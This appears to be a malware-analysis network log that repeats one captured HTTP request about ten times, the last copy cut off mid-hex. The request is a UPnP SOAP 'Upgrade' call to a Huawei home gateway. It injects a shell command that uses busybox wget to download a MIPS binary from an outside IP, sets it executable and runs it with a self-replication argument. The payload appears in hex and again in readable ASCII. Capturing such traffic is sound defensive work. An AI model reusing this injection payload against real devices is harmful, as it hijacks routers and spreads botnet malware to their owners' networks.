          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f 2e 77 65 69 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
          Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 458Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 